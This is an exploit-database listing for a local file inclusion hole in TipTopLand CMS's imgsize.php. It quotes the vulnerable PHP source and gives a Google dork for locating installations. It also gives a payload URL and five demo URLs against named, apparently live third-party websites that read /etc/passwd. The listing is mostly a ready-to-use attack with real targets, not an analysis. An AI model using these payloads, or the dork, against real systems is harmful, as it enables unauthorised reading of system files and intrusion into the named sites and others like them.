Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-98 | Varies | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Local | 2020-05-09 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
####################################################### # Exploit Title : TipTopLand CMS - Local File Inclusion Vulnerability # Date : 2020-05-08 # Exploit Author : Freedom Fighter # Vendor Homepage : tiptopland.com # Google Dork : intext:"TipTopLand Design Studio" # category : Webapps # Tested on : Google Chrome Browser ####################################################### -- Vulnerable Page: /imgsize.php -- Vulnerable Source: 28: $img = $_GET['img']; 74: $im = @ImageCreateFromJPEG ($img) or // Read JPEG Image 75: $im = @ImageCreateFromPNG ($img) or // or PNG Image 76: $im = @ImageCreateFromGIF ($img) or // or GIF Image 77: $im = false; // If image is not JPEG, PNG, or GIF 79: if (!$im) { 82: readfile ($img); -- Payload: view-source:target/imgsize.php?img=[file]&w=0 -- DEMO: view-source:http://pardisyazd.com/imgsize.php?img=/etc/passwd&w=0 view-source:http://www.behsarma.com/imgsize.php?img=/etc/passwd&w=0 view-source:http://www.nsmdrywall.com/imgsize.php?img=/etc/passwd&w=0 view-source:http://vistapanel.ir/imgsize.php?img=/etc/passwd&w=0 view-source:http://www.mafaco.ir/imgsize.php?img=/etc/passwd&w=0
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.